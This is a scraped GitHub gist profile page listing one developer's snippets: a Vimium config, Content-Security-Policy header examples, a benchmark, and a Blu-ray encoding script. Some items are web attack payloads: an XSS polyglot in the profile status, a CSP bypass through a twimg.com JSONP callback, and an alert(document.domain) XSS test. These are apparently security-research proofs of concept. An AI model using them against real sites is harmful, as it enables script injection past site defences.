Skip to content

Instantly share code, notes, and snippets.

View shinkbr's full-sized avatar
:shipit:
'"><svg/onload=alert()>{{7*7}}

Shintaro Kobori shinkbr

:shipit:
'"><svg/onload=alert()>{{7*7}}
15 followers · 12 following
View GitHub Profile
@shinkbr
shinkbr / vimium-options.json
Last active September 12, 2018 05:29
vimium configuration json
{
"settingsVersion": "1.64",
"exclusionRules": [
{
"pattern": "https?://mail.google.com/*",
"passKeys": ""
}
],
"filterLinkHints": false,
"waitForEnterForFilteredHints": true,
@shinkbr
shinkbr / csp-bypass.html
Created August 23, 2018 18:25
CSP bypass using twitter.com and twimg.com's JSONP endpoint
<script src="https://platform.twitter.com/widgets.js"></script>
<script src="https://cdn.syndication.twimg.com/timeline/profile?callback=__twttr/window.alert&screen_name=shinkbr"></script>
@shinkbr
shinkbr / pixiv-inside-csp3-01
Last active October 7, 2018 00:38
code snippets for pixiv inside article https://inside.pixiv.blog/kobo/5137
# 'self' と trusted.example.comのJSのみ実行を許可する
content-security-policy: script-src 'self' trusted.example.com
# 上記に加えてinline scriptの実行も許可する (XSS対策としての恩恵はほぼ無い)
content-security-policy: script-src 'self' trusted.example.com 'unsafe-inline'
@shinkbr
shinkbr / 1-a
Last active September 22, 2019 16:10
aaa
@shinkbr
shinkbr / README.md
Last active October 22, 2019 18:42 
$ time ./a.out
4./a.out  18.75s user 0.01s system 99% cpu 18.879 total

$ time ./b.out
4./b.out  23.44s user 0.02s system 99% cpu 23.550 total

$ gcc --version
Configured with: --prefix=/Library/Developer/CommandLineTools/usr --with-gxx-include-dir=/Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/include/c++/4.2.1
Apple clang version 11.0.0 (clang-1100.0.33.8)
@shinkbr
shinkbr / a.sh
Last active May 21, 2023 10:29
#!/bin/bash
# Encodes a bluray disc into mp4.
# ffmpeg parameters are tuned for blu-ray anime.
usage(){
echo "Usage: sudo $(basename $0) BD_ISO"
}
if [ $# -ne 1 ]
@shinkbr
shinkbr / alert.js
Created January 21, 2024 17:23
xss test
alert(document.domain);